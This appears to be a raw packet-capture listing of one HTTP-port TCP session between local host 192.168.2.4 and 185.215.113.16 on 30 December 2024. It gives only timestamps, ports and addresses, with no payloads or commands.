Dec 30, 2024 15:53:34.657030106 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.657051086 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.657066107 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.657077074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.657098055 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.657130003 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658124924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658138990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658154011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658166885 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658173084 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658222914 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658335924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658355951 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658366919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658387899 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658410072 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658422947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658444881 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658452034 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658484936 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658538103 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658587933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658598900 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658611059 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658627987 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658662081 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658668041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658680916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658710003 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658721924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658721924 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658760071 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658795118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658843040 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658854008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658864975 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658874989 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658909082 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.658929110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658946991 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658963919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.658982038 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659061909 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659075022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659086943 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659106016 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659123898 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659142017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659153938 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659166098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659214020 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659246922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659259081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659270048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659290075 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659291983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659317017 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659384012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659404993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659415960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659434080 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659459114 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659492016 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659502983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659514904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659539938 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659567118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659579039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659609079 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659642935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659683943 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659693956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659706116 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659745932 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659791946 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659802914 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659816027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659827948 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.659845114 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.659877062 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.661818027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.661835909 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.661844969 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.661873102 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.661899090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.661910057 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.661919117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.661930084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.661937952 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.661977053 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662054062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662067890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662077904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662089109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662096024 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662100077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662126064 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662163019 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662180901 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662192106 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662201881 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662213087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662219048 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662223101 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662254095 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662440062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662482977 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662508011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662522078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662540913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662554026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662559032 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662591934 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662616968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662679911 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662689924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662700891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662714005 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662723064 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662724972 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662735939 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.662740946 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.662777901 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.663244963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.663254023 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.663280964 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.664896965 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.700609922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.700619936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.700678110 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.743822098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743840933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743851900 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743861914 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743871927 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743880987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743891001 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743900061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743905067 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.743940115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743948936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743952036 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.743957996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.743963957 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.744003057 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.744837046 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.744848013 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.744858027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.744880915 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.744896889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.744899035 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.744908094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.744957924 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.788099051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788113117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788122892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788151026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.788269043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788279057 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788307905 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.788310051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788328886 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788340092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788347960 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.788351059 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.788381100 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.789027929 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789038897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789048910 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789057016 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789066076 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.789088964 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.789093971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789134979 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.789180994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789190054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789199114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789208889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789231062 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.789263010 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.789346933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789499044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789508104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.789540052 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790092945 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790105104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790117025 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790133953 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790133953 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790146112 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790155888 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790158033 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790168047 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790178061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790182114 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790189981 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790199995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790210962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790215015 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790222883 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790237904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790246010 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790249109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790260077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790270090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790282011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790301085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790302038 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790311098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790321112 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790324926 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790332079 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790343046 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790349960 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790352106 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790365934 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790375948 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790376902 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790386915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790396929 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790406942 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790407896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790429115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790440083 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790446043 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790451050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790461063 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790472031 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790473938 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790482998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790502071 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790503979 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790512085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790520906 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790529013 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790532112 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790541887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790548086 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790553093 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790565014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790577888 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790596008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790599108 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790606022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790617943 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790620089 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790627956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790638924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790648937 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790658951 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790662050 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790669918 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790680885 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790688038 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790697098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790708065 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790718079 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790719986 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790735960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790739059 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790745974 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790755033 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790759087 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790767908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790779114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790788889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790791035 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790798903 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790807962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790822029 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790824890 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790832043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790842056 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790847063 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790852070 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790863037 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790869951 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790874004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790883064 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790884018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790900946 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790905952 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790913105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790924072 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790925026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790935040 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790940046 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790946007 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790957928 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790961981 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.790970087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790981054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790996075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.790997982 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.791004896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.791011095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.791016102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.791018009 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.791022062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.791037083 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.791040897 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.791048050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.791059017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.791069031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.791073084 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.791088104 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.791106939 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.804311037 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.831212044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.831238031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.831249952 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.831260920 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.831271887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.831283092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.831295013 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.831298113 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.831355095 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.837215900 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.837228060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.837244034 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.837279081 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.837326050 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.837353945 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.837364912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.837376118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.837388039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.837397099 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.837435961 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874083996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874097109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874109030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874130964 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874170065 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874181032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874191999 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874213934 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874244928 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874283075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874294043 CET	80	49744	185.215.113.16	192.168.2.4
